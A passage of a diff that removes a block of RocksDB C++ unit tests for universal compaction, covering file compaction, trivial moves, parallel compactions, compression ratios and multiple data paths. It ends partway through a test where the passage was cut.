-TEST_P(DBTestUniversalCompaction, CompactFilesOnUniversalCompaction) {
-  const int kTestKeySize = 16;
-  const int kTestValueSize = 984;
-  const int kEntrySize = kTestKeySize + kTestValueSize;
-  const int kEntriesPerBuffer = 10;
-
-  ChangeCompactOptions();
-  Options options;
-  options.create_if_missing = true;
-  options.compaction_style = kCompactionStyleLevel;
-  options.num_levels = 1;
-  options.target_file_size_base = options.write_buffer_size;
-  options.compression = kNoCompression;
-  options = CurrentOptions(options);
-  options.write_buffer_size = kEntrySize * kEntriesPerBuffer;
-  CreateAndReopenWithCF({"pikachu"}, options);
-  ASSERT_EQ(options.compaction_style, kCompactionStyleUniversal);
-  Random rnd(301);
-  for (int key = 1024 * kEntriesPerBuffer; key >= 0; --key) {
-    ASSERT_OK(Put(1, ToString(key), RandomString(&rnd, kTestValueSize)));
-  }
-  dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-  dbfull()->TEST_WaitForCompact();
-  ColumnFamilyMetaData cf_meta;
-  dbfull()->GetColumnFamilyMetaData(handles_[1], &cf_meta);
-  std::vector<std::string> compaction_input_file_names;
-  for (auto file : cf_meta.levels[0].files) {
-    if (rnd.OneIn(2)) {
-      compaction_input_file_names.push_back(file.name);
-    }
-  }
-
-  if (compaction_input_file_names.size() == 0) {
-    compaction_input_file_names.push_back(
-        cf_meta.levels[0].files[0].name);
-  }
-
-  // expect fail since universal compaction only allow L0 output
-  ASSERT_FALSE(dbfull()
-                   ->CompactFiles(CompactionOptions(), handles_[1],
-                                  compaction_input_file_names, 1)
-                   .ok());
-
-  // expect ok and verify the compacted files no longer exist.
-  ASSERT_OK(dbfull()->CompactFiles(
-      CompactionOptions(), handles_[1],
-      compaction_input_file_names, 0));
-
-  dbfull()->GetColumnFamilyMetaData(handles_[1], &cf_meta);
-  VerifyCompactionResult(
-      cf_meta,
-      std::set<std::string>(compaction_input_file_names.begin(),
-          compaction_input_file_names.end()));
-
-  compaction_input_file_names.clear();
-
-  // Pick the first and the last file, expect everything is
-  // compacted into one single file.
-  compaction_input_file_names.push_back(
-      cf_meta.levels[0].files[0].name);
-  compaction_input_file_names.push_back(
-      cf_meta.levels[0].files[
-          cf_meta.levels[0].files.size() - 1].name);
-  ASSERT_OK(dbfull()->CompactFiles(
-      CompactionOptions(), handles_[1],
-      compaction_input_file_names, 0));
-
-  dbfull()->GetColumnFamilyMetaData(handles_[1], &cf_meta);
-  ASSERT_EQ(cf_meta.levels[0].files.size(), 1U);
-}
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionTargetLevel) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.write_buffer_size = 100 << 10;     // 100KB
-  options.num_levels = 7;
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-
-  // Generate 3 overlapping files
-  Random rnd(301);
-  for (int i = 0; i < 210; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 100)));
-  }
-  ASSERT_OK(Flush());
-
-  for (int i = 200; i < 300; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 100)));
-  }
-  ASSERT_OK(Flush());
-
-  for (int i = 250; i < 260; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 100)));
-  }
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ("3", FilesPerLevel(0));
-  // Compact all files into 1 file and put it in L4
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 4;
-  compact_options.exclusive_manual_compaction = exclusive_manual_compaction_;
-  db_->CompactRange(compact_options, nullptr, nullptr);
-  ASSERT_EQ("0,0,0,0,1", FilesPerLevel(0));
-}
-
-
-class DBTestUniversalCompactionMultiLevels
-    : public DBTestUniversalCompactionBase {
- public:
-  DBTestUniversalCompactionMultiLevels() :
-      DBTestUniversalCompactionBase(
-          "/db_universal_compaction_multi_levels_test") {}
-};
-
-TEST_P(DBTestUniversalCompactionMultiLevels, UniversalCompactionMultiLevels) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 100 << 10;  // 100KB
-  options.level0_file_num_compaction_trigger = 8;
-  options.max_background_compactions = 3;
-  options.target_file_size_base = 32 * 1024;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Trigger compaction if size amplification exceeds 110%
-  options.compaction_options_universal.max_size_amplification_percent = 110;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  Random rnd(301);
-  int num_keys = 100000;
-  for (int i = 0; i < num_keys * 2; i++) {
-    ASSERT_OK(Put(1, Key(i % num_keys), Key(i)));
-  }
-
-  dbfull()->TEST_WaitForCompact();
-
-  for (int i = num_keys; i < num_keys * 2; i++) {
-    ASSERT_EQ(Get(1, Key(i % num_keys)), Key(i));
-  }
-}
-// Tests universal compaction with trivial move enabled
-TEST_P(DBTestUniversalCompactionMultiLevels, UniversalCompactionTrivialMove) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) {
-        non_trivial_move++;
-        ASSERT_TRUE(arg != nullptr);
-        int output_level = *(static_cast<int*>(arg));
-        ASSERT_EQ(output_level, 0);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.allow_trivial_move = true;
-  options.num_levels = 3;
-  options.write_buffer_size = 100 << 10;  // 100KB
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_background_compactions = 2;
-  options.target_file_size_base = 32 * 1024;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Trigger compaction if size amplification exceeds 110%
-  options.compaction_options_universal.max_size_amplification_percent = 110;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  Random rnd(301);
-  int num_keys = 150000;
-  for (int i = 0; i < num_keys; i++) {
-    ASSERT_OK(Put(1, Key(i), Key(i)));
-  }
-  std::vector<std::string> values;
-
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_GT(trivial_move, 0);
-  ASSERT_GT(non_trivial_move, 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-INSTANTIATE_TEST_CASE_P(DBTestUniversalCompactionMultiLevels,
-                        DBTestUniversalCompactionMultiLevels,
-                        ::testing::Combine(::testing::Values(3, 20),
-                                           ::testing::Bool()));
-
-class DBTestUniversalCompactionParallel :
-    public DBTestUniversalCompactionBase {
- public:
-  DBTestUniversalCompactionParallel() :
-      DBTestUniversalCompactionBase(
-          "/db_universal_compaction_prallel_test") {}
-};
-
-TEST_P(DBTestUniversalCompactionParallel, UniversalCompactionParallel) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 1 << 10;  // 1KB
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_background_compactions = 3;
-  options.max_background_flushes = 3;
-  options.target_file_size_base = 1 * 1024;
-  options.compaction_options_universal.max_size_amplification_percent = 110;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Delay every compaction so multiple compactions will happen.
-  std::atomic<int> num_compactions_running(0);
-  std::atomic<bool> has_parallel(false);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack("CompactionJob::Run():Start",
-                                                 [&](void* arg) {
-    if (num_compactions_running.fetch_add(1) > 0) {
-      has_parallel.store(true);
-      return;
-    }
-    for (int nwait = 0; nwait < 20000; nwait++) {
-      if (has_parallel.load() || num_compactions_running.load() > 1) {
-        has_parallel.store(true);
-        break;
-      }
-      env_->SleepForMicroseconds(1000);
-    }
-  });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "CompactionJob::Run():End",
-      [&](void* arg) { num_compactions_running.fetch_add(-1); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  Random rnd(301);
-  int num_keys = 30000;
-  for (int i = 0; i < num_keys * 2; i++) {
-    ASSERT_OK(Put(1, Key(i % num_keys), Key(i)));
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_EQ(num_compactions_running.load(), 0);
-  ASSERT_TRUE(has_parallel.load());
-
-  for (int i = num_keys; i < num_keys * 2; i++) {
-    ASSERT_EQ(Get(1, Key(i % num_keys)), Key(i));
-  }
-
-  // Reopen and check.
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  for (int i = num_keys; i < num_keys * 2; i++) {
-    ASSERT_EQ(Get(1, Key(i % num_keys)), Key(i));
-  }
-}
-
-TEST_P(DBTestUniversalCompactionParallel, PickByFileNumberBug) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 1 * 1024;  // 1KB
-  options.level0_file_num_compaction_trigger = 7;
-  options.max_background_compactions = 2;
-  options.target_file_size_base = 1024 * 1024;  // 1MB
-
-  // Disable size amplifiction compaction
-  options.compaction_options_universal.max_size_amplification_percent =
-      UINT_MAX;
-  DestroyAndReopen(options);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBTestUniversalCompactionParallel::PickByFileNumberBug:0",
-        "BackgroundCallCompaction:0"},
-       {"UniversalCompactionPicker::PickCompaction:Return",
-        "DBTestUniversalCompactionParallel::PickByFileNumberBug:1"},
-       {"DBTestUniversalCompactionParallel::PickByFileNumberBug:2",
-        "CompactionJob::Run():Start"}});
-
-  int total_picked_compactions = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "UniversalCompactionPicker::PickCompaction:Return", [&](void* arg) {
-        if (arg) {
-          total_picked_compactions++;
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Write 7 files to trigger compaction
-  int key_idx = 1;
-  for (int i = 1; i <= 70; i++) {
-    std::string k = Key(key_idx++);
-    ASSERT_OK(Put(k, k));
-    if (i % 10 == 0) {
-      ASSERT_OK(Flush());
-    }
-  }
-
-  // Wait for the 1st background compaction process to start
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:0");
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:1");
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-
-  // Write 3 files while 1st compaction is held
-  // These 3 files have different sizes to avoid compacting based on size_ratio
-  int num_keys = 1000;
-  for (int i = 0; i < 3; i++) {
-    for (int j = 1; j <= num_keys; j++) {
-      std::string k = Key(key_idx++);
-      ASSERT_OK(Put(k, k));
-    }
-    ASSERT_OK(Flush());
-    num_keys -= 100;
-  }
-
-  // Hold the 1st compaction from finishing
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:2");
-  dbfull()->TEST_WaitForCompact();
-
-  // There should only be one picked compaction as the score drops below one
-  // after the first one is picked.
-  EXPECT_EQ(total_picked_compactions, 1);
-  EXPECT_EQ(TotalTableFiles(), 4);
-
-  // Stop SyncPoint and destroy the DB and reopen it again
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  key_idx = 1;
-  total_picked_compactions = 0;
-  DestroyAndReopen(options);
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Write 7 files to trigger compaction
-  for (int i = 1; i <= 70; i++) {
-    std::string k = Key(key_idx++);
-    ASSERT_OK(Put(k, k));
-    if (i % 10 == 0) {
-      ASSERT_OK(Flush());
-    }
-  }
-
-  // Wait for the 1st background compaction process to start
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:0");
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:1");
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-
-  // Write 8 files while 1st compaction is held
-  // These 8 files have different sizes to avoid compacting based on size_ratio
-  num_keys = 1000;
-  for (int i = 0; i < 8; i++) {
-    for (int j = 1; j <= num_keys; j++) {
-      std::string k = Key(key_idx++);
-      ASSERT_OK(Put(k, k));
-    }
-    ASSERT_OK(Flush());
-    num_keys -= 100;
-  }
-
-  // Wait for the 2nd background compaction process to start
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:0");
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:1");
-
-  // Hold the 1st and 2nd compaction from finishing
-  TEST_SYNC_POINT("DBTestUniversalCompactionParallel::PickByFileNumberBug:2");
-  dbfull()->TEST_WaitForCompact();
-
-  // This time we will trigger a compaction because of size ratio and
-  // another compaction because of number of files that are not compacted
-  // greater than 7
-  EXPECT_GE(total_picked_compactions, 2);
-}
-
-INSTANTIATE_TEST_CASE_P(DBTestUniversalCompactionParallel,
-                        DBTestUniversalCompactionParallel,
-                        ::testing::Combine(::testing::Values(1, 10),
-                                           ::testing::Values(false)));
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionOptions) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.write_buffer_size = 105 << 10;    // 105KB
-  options.arena_block_size = 4 << 10;       // 4KB
-  options.target_file_size_base = 32 << 10;  // 32KB
-  options.level0_file_num_compaction_trigger = 4;
-  options.num_levels = num_levels_;
-  options.compaction_options_universal.compression_size_percent = -1;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  for (int num = 0; num < options.level0_file_num_compaction_trigger; num++) {
-    // Write 100KB (100 values, each 1K)
-    for (int i = 0; i < 100; i++) {
-      ASSERT_OK(Put(1, Key(key_idx), RandomString(&rnd, 990)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-
-    if (num < options.level0_file_num_compaction_trigger - 1) {
-      ASSERT_EQ(NumSortedRuns(1), num + 1);
-    }
-  }
-
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(NumSortedRuns(1), 1);
-}
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionStopStyleSimilarSize) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.write_buffer_size = 105 << 10;    // 105KB
-  options.arena_block_size = 4 << 10;       // 4KB
-  options.target_file_size_base = 32 << 10;  // 32KB
-  // trigger compaction if there are >= 4 files
-  options.level0_file_num_compaction_trigger = 4;
-  options.compaction_options_universal.size_ratio = 10;
-  options.compaction_options_universal.stop_style =
-      kCompactionStopStyleSimilarSize;
-  options.num_levels = num_levels_;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // Stage 1:
-  //   Generate a set of files at level 0, but don't trigger level-0
-  //   compaction.
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 1;
-       num++) {
-    // Write 100KB (100 values, each 1K)
-    for (int i = 0; i < 100; i++) {
-      ASSERT_OK(Put(Key(key_idx), RandomString(&rnd, 990)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    ASSERT_EQ(NumSortedRuns(), num + 1);
-  }
-
-  // Generate one more file at level-0, which should trigger level-0
-  // compaction.
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(Put(Key(key_idx), RandomString(&rnd, 990)));
-    key_idx++;
-  }
-  dbfull()->TEST_WaitForCompact();
-  // Suppose each file flushed from mem table has size 1. Now we compact
-  // (level0_file_num_compaction_trigger+1)=4 files and should have a big
-  // file of size 4.
-  ASSERT_EQ(NumSortedRuns(), 1);
-
-  // Stage 2:
-  //   Now we have one file at level 0, with size 4. We also have some data in
-  //   mem table. Let's continue generating new files at level 0, but don't
-  //   trigger level-0 compaction.
-  //   First, clean up memtable before inserting new data. This will generate
-  //   a level-0 file, with size around 0.4 (according to previously written
-  //   data amount).
-  dbfull()->Flush(FlushOptions());
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 3;
-       num++) {
-    // Write 110KB (11 values, each 10K)
-    for (int i = 0; i < 100; i++) {
-      ASSERT_OK(Put(Key(key_idx), RandomString(&rnd, 990)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    ASSERT_EQ(NumSortedRuns(), num + 3);
-  }
-
-  // Generate one more file at level-0, which should trigger level-0
-  // compaction.
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(Put(Key(key_idx), RandomString(&rnd, 990)));
-    key_idx++;
-  }
-  dbfull()->TEST_WaitForCompact();
-  // Before compaction, we have 4 files at level 0, with size 4, 0.4, 1, 1.
-  // After compaction, we should have 3 files, with size 4, 0.4, 2.
-  ASSERT_EQ(NumSortedRuns(), 3);
-  // Stage 3:
-  //   Now we have 3 files at level 0, with size 4, 0.4, 2. Generate one
-  //   more file at level-0, which should trigger level-0 compaction.
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(Put(Key(key_idx), RandomString(&rnd, 990)));
-    key_idx++;
-  }
-  dbfull()->TEST_WaitForCompact();
-  // Level-0 compaction is triggered, but no file will be picked up.
-  ASSERT_EQ(NumSortedRuns(), 4);
-}
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionCompressRatio1) {
-  if (!Snappy_Supported()) {
-    return;
-  }
-
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.write_buffer_size = 100 << 10;     // 100KB
-  options.target_file_size_base = 32 << 10;  // 32KB
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = num_levels_;
-  options.compaction_options_universal.compression_size_percent = 70;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // The first compaction (2) is compressed.
-  for (int num = 0; num < 2; num++) {
-    // Write 110KB (11 values, each 10K)
-    for (int i = 0; i < 11; i++) {
-      ASSERT_OK(Put(Key(key_idx), CompressibleString(&rnd, 10000)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_LT(TotalSize(), 110000U * 2 * 0.9);
-
-  // The second compaction (4) is compressed
-  for (int num = 0; num < 2; num++) {
-    // Write 110KB (11 values, each 10K)
-    for (int i = 0; i < 11; i++) {
-      ASSERT_OK(Put(Key(key_idx), CompressibleString(&rnd, 10000)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_LT(TotalSize(), 110000 * 4 * 0.9);
-
-  // The third compaction (2 4) is compressed since this time it is
-  // (1 1 3.2) and 3.2/5.2 doesn't reach ratio.
-  for (int num = 0; num < 2; num++) {
-    // Write 110KB (11 values, each 10K)
-    for (int i = 0; i < 11; i++) {
-      ASSERT_OK(Put(Key(key_idx), CompressibleString(&rnd, 10000)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_LT(TotalSize(), 110000 * 6 * 0.9);
-
-  // When we start for the compaction up to (2 4 8), the latest
-  // compressed is not compressed.
-  for (int num = 0; num < 8; num++) {
-    // Write 110KB (11 values, each 10K)
-    for (int i = 0; i < 11; i++) {
-      ASSERT_OK(Put(Key(key_idx), CompressibleString(&rnd, 10000)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_GT(TotalSize(), 110000 * 11 * 0.8 + 110000 * 2);
-}
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionCompressRatio2) {
-  if (!Snappy_Supported()) {
-    return;
-  }
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.write_buffer_size = 100 << 10;     // 100KB
-  options.target_file_size_base = 32 << 10;  // 32KB
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = num_levels_;
-  options.compaction_options_universal.compression_size_percent = 95;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // When we start for the compaction up to (2 4 8), the latest
-  // compressed is compressed given the size ratio to compress.
-  for (int num = 0; num < 14; num++) {
-    // Write 120KB (12 values, each 10K)
-    for (int i = 0; i < 12; i++) {
-      ASSERT_OK(Put(Key(key_idx), CompressibleString(&rnd, 10000)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-  ASSERT_LT(TotalSize(), 120000U * 12 * 0.8 + 120000 * 2);
-}
-
-// Test that checks trivial move in universal compaction
-TEST_P(DBTestUniversalCompaction, UniversalCompactionTrivialMoveTest1) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) {
-        non_trivial_move++;
-        ASSERT_TRUE(arg != nullptr);
-        int output_level = *(static_cast<int*>(arg));
-        ASSERT_EQ(output_level, 0);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.allow_trivial_move = true;
-  options.num_levels = 2;
-  options.write_buffer_size = 100 << 10;  // 100KB
-  options.level0_file_num_compaction_trigger = 3;
-  options.max_background_compactions = 1;
-  options.target_file_size_base = 32 * 1024;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Trigger compaction if size amplification exceeds 110%
-  options.compaction_options_universal.max_size_amplification_percent = 110;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  Random rnd(301);
-  int num_keys = 250000;
-  for (int i = 0; i < num_keys; i++) {
-    ASSERT_OK(Put(1, Key(i), Key(i)));
-  }
-  std::vector<std::string> values;
-
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_GT(trivial_move, 0);
-  ASSERT_GT(non_trivial_move, 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-// Test that checks trivial move in universal compaction
-TEST_P(DBTestUniversalCompaction, UniversalCompactionTrivialMoveTest2) {
-  int32_t trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial", [&](void* arg) {
-        ASSERT_TRUE(arg != nullptr);
-        int output_level = *(static_cast<int*>(arg));
-        ASSERT_EQ(output_level, 0);
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.allow_trivial_move = true;
-  options.num_levels = 15;
-  options.write_buffer_size = 100 << 10;  // 100KB
-  options.level0_file_num_compaction_trigger = 8;
-  options.max_background_compactions = 2;
-  options.target_file_size_base = 64 * 1024;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Trigger compaction if size amplification exceeds 110%
-  options.compaction_options_universal.max_size_amplification_percent = 110;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  Random rnd(301);
-  int num_keys = 500000;
-  for (int i = 0; i < num_keys; i++) {
-    ASSERT_OK(Put(1, Key(i), Key(i)));
-  }
-  std::vector<std::string> values;
-
-  ASSERT_OK(Flush(1));
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_GT(trivial_move, 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionFourPaths) {
-  Options options = CurrentOptions();
-  options.db_paths.emplace_back(dbname_, 300 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_2", 300 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_3", 500 * 1024);
-  options.db_paths.emplace_back(dbname_ + "_4", 1024 * 1024 * 1024);
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(KNumKeysByGenerateNewFile - 1));
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.size_ratio = 5;
-  options.write_buffer_size = 111 << 10;  // 114KB
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = 1;
-
-  std::vector<std::string> filenames;
-  env_->GetChildren(options.db_paths[1].path, &filenames);
-  // Delete archival files.
-  for (size_t i = 0; i < filenames.size(); ++i) {
-    env_->DeleteFile(options.db_paths[1].path + "/" + filenames[i]);
-  }
-  env_->DeleteDir(options.db_paths[1].path);
-  Reopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // First three 110KB files are not going to second path.
-  // After that, (100K, 200K)
-  for (int num = 0; num < 3; num++) {
-    GenerateNewFile(&rnd, &key_idx);
-  }
-
-  // Another 110KB triggers a compaction to 400K file to second path
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[2].path));
-
-  // (1, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1,1,4) -> (2, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // (1, 2, 4) -> (3, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // (1, 3, 4) -> (8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[3].path));
-
-  // (1, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[3].path));
-  ASSERT_EQ(1, GetSstFileCount(dbname_));
-
-  // (1, 1, 8) -> (2, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[3].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-
-  // (1, 2, 8) -> (3, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[3].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[1].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  // (1, 3, 8) -> (4, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[3].path));
-
-  // (1, 4, 8) -> (5, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[3].path));
-  ASSERT_EQ(1, GetSstFileCount(options.db_paths[2].path));
-  ASSERT_EQ(0, GetSstFileCount(dbname_));
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Reopen(options);
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Destroy(options);
-}
-
-TEST_P(DBTestUniversalCompaction, IncreaseUniversalCompactionNumLevels) {
-  std::function<void(int)> verify_func = [&](int num_keys_in_db) {
-    std::string keys_in_db;
-    Iterator* iter = dbfull()->NewIterator(ReadOptions(), handles_[1]);
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      keys_in_db.append(iter->key().ToString());
-      keys_in_db.push_back(',');
-    }
-    delete iter;
-
-    std::string expected_keys;
-    for (int i = 0; i <= num_keys_in_db; i++) {
-      expected_keys.append(Key(i));
-      expected_keys.push_back(',');
-    }
-
-    ASSERT_EQ(keys_in_db, expected_keys);
-  };
-
-  Random rnd(301);
-  int max_key1 = 200;
-  int max_key2 = 600;
-  int max_key3 = 800;
-  const int KNumKeysPerFile = 10;
-
-  // Stage 1: open a DB with universal compaction, num_levels=1
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = 1;
-  options.write_buffer_size = 200 << 10;  // 200KB
-  options.level0_file_num_compaction_trigger = 3;
-  options.memtable_factory.reset(new SpecialSkipListFactory(KNumKeysPerFile));
-  options = CurrentOptions(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  for (int i = 0; i <= max_key1; i++) {
-    // each value is 10K
